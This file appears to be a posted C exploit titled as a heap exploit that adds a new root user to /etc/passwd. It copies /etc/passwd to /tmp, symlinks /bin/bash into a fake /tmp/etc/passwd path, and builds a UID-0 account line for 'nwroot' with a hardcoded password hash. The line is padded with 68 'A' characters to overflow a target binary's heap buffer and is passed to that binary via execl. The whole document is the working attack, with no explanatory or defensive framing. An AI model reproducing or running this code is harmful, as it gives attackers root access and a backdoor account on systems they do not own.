Heap Exploit for new root in /etc/passwd

gistfile1.txt

#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <string.h>

#define PASS   "/etc/passwd"
#define PASSBK "/tmp/passwd.bkup"
#define TMP    "/tmp/etc"
#define TMP2   "/tmp/etc/passwd"
#define BIN    "/bin/bash"

int main(int argc, char *argv[]) {
  FILE *fp1, *fp2;
  register int key;
  struct stat st = {0};
  char buf[120], pbuf[120];

  if(argc < 3) {
    printf("Usage: %s <execute of binary> <name of your binary>\n", argv[0]);
    printf("Example: %s ./main main", argv[0]);
    exit(-1);
  }

  fp1 = fopen(PASS, "rb");
  
  if(fp1 == NULL) {
    fprintf(stderr, "Can't open source file\n");
    return EXIT_FAILURE;
  }

  fp2 = fopen(PASSBK, "wb");

  if(fp2 == NULL) {
    fclose(fp1);
    fprintf(stderr, "Can't open dest file\n");
    return EXIT_FAILURE;
  }

  while((key=fgetc(fp1)) != EOF) {
    fputc(key, fp2); 
  }

  fclose(fp1);
  fclose(fp2);

  printf("Copied %s into %s\n", PASS, PASSBK);

  if(stat(TMP, &st) == -1) {
    mkdir(TMP, 0777);
    printf("%s created\n", TMP);
  } else {
    printf("%s already exists\n", TMP);
  }

  if(symlink(BIN, TMP2) == -1) {
    printf("Could not link %s to %s\n", BIN, TMP2);
  } else {
    printf("Linked %s to %s\n", BIN, TMP2);
  }

  // Creating new user called nwroot with password
  // == password; perl -e 'print crypt("password", "XX"). "\n"'
  strcpy(buf, "nwroot:XXq2wKiyI43A2:0:0:");

  // 'A'*68
  memset(pbuf, 'A', 68);
  buf[sizeof(pbuf) - 1] = '\0';

  strcat(buf, pbuf);
  strcat(buf, ":/root:/tmp/etc/passwd");

  printf("\nCreating buffer: %s\n", buf);
  printf("\nNew Root Login: nwroot\t\tPassword: password\n\n");

  execl(argv[1], argv[2], buf, 0);  
  
  return 0;
}